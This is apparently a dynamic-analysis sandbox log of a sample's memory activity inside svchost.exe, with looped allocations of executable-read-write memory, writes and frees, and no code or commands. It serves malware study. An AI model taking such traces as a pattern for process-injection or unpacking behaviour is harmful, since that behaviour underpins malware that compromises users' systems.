Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400191b0, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 6	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20016, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400191b8, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 11	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001b, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400191c0, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 8	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20018, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400191c8, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 5	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20015, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400191d0, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 15	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001f, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400191d8, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 6	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20016, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400191e0, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 11	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001b, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400191e8, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 5	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20015, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400191f0, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 15	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001f, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1400191f8, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 21	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20025, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019200, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 12	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001c, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019208, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 6	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20016, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019210, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 7	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20017, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019218, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 8	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20018, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019220, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 10	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001a, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019228, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 19	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20023, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019230, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 7	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20017, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019238, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 22	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20026, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019240, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 6	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20016, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019248, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 12	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001c, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019250, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 15	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001f, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019258, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 8	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x20018, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019260, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 13	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001d, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019268, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 14	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968	1	Fn
Memory	Read	process_name = svchost.exe, address = 0x2001e, size = 8	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x140019270, size = 8	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20010, size = 9	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x70000, size = 48	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 72	1	Fn Data
